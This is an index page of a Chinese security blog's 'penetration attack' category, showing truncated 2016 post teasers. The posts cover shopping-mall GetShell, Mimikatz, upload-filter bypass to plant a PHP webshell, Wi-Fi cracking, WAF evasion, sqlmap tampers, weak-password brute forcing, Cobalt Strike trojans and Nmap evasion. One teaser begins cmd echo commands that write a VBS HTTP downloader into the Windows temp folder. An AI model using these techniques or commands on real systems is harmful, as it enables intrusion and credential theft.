渗透攻击

2016-08-07 legend 阅读(9299) 评论(0)

[crayon-6324c404b98e5797276403/]   转载请注明： 转载自Legend‘s BLog 本文链接地址: 乐尚商城GetShell 未经允许不得转载：Legend‘s BLog » 乐尚商城 […]

2016-08-07 legend 阅读(16054) 评论(0)

Mimikatz现在已经内置在Metasploit’s meterpreter里面，我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件，绑定payload之类的东西太过复杂，我们可以有更好的办法，只需要在自己的电脑上运行 […]

2016-08-04 legend 阅读(10572) 评论(0)

echo ^Set Post = CreateObject(“Msxml2.XMLHTTP”)^ >>c:\windows\temp\666999.txt echo ^Set Shell = Create […]

2016-07-24 legend 阅读(49403) 评论(0)

1，检测javascript类型的绕过（客户端） – 通常post请求发送到web服务器，客户端javascript验证 上传1.php弹窗说上传格式错误，只允许.jpg，.jpeg等格式的文件 上传一句话1.php– […]

2016-06-26 legend 阅读(13541) 评论(0)

Fluxion是一个无线破解工具，这个工具有点像是Linset的翻版。但是与Linset比较起来，它有着更多有趣的功能。目前这个工具在Kali Linux上可以完美运行。 工作原理 1.扫描能够接收到的WIFI信号 2.抓取握手包(这一步的 […]

2016-06-26 legend 阅读(27031) 评论(0)

0x00 前言 在我们平时做渗透测试的时候，难免会遇到各种WAF的阻挡。这时一款良好的绕过WAF的渗透测试工具就显得很受渗透测人员欢迎，在这里我们推荐一款绕过WAF的实用渗透工具，希望对大家平时做渗透有所帮助。 0x01简介 WAFNinj […]

2016-06-01 legend 阅读(10101) 评论(0)

[crayon-6324c404bb592456537729/]   转载请注明： 转载自Legend‘s BLog 本文链接地址: sqlmap tamper脚本——space2myscript 未经允许不得转载：Legend‘ […]

2016-05-31 legend 阅读(10829) 评论(0)

21 ftp  主要看是否支持匿名，也可以跑弱口令 22 ssh 弱口令爆破 23 telnet 弱口令爆破 69/udp TFTP udp端口 80 web  常见渗透web漏洞 161 snmp public 弱口令 案例:WooYun […]

2016-05-30 legend 阅读(22251) 评论(0)

0x00 简介 Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒 […]

2016-05-30 legend 阅读(19466) 评论(0)

本文为作者总结自己在渗透测试中常用的一些小技巧。原文分为两部分，译者将其合二为一，方便大家查阅。 最好的 NMAP 扫描策略 [crayon-6324c404be9f7790438495/] Nmap – 躲避防火墙 [crayon-632 […]